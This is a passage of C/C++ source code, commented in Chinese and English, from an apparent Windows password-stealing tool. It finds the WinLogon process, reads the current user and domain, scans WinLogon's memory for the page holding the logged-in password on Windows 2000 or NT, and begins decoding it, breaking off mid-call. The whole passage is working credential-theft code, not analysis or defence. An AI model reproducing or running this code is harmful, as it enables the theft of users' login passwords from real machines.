nbsp;   DWORD dwWinLogonPID = FindWinLogon ();
    if(!dwWinLogonPID)
    {
        // 找不到进程WinLogon 或者正在使用 NWGINA.DLL
        // 导致不能在内存中找到密码
        FreeLibrary(hNtDll);
        return false;
    }
    // Format("主进程WinLogon的id是 %d (0x%8.8x).\n",
    // ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID))));
    // Set values to check memory block against.
    memset(wszUserName, 0, sizeof (wszUserName));
    memset(wszUserDomain, 0, sizeof (wszUserDomain));
    GetEnvironmentVariableW(L"USERNAME",wszUserName,0x400);
    GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400);

    // Locate the block of memory containing
    // the password in WinLogon''s memory space.
    BOOL bFoundPasswordPage;
    //bFoundPasswordPage = FALSE;
    if(IsWin2K())
        bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen);
    else
        bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen);
    if(bFoundPasswordPage)
    {
        if(dwPwdLen == 0)
        {
            // Format("登陆信息为: 域名：%S/密码：%S.\n",
            // ARRAYOFCONST((wszUserDomain, wszUserName))));
            // 密码长度为空，系统没有密码
        }
        else
        {
            // Format("找到了密码，长度为%d\n", ARRAYOFCONST(((int)dwPwdLen))));
            // Decode the password string.
            if(IsWin2K())
                ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd)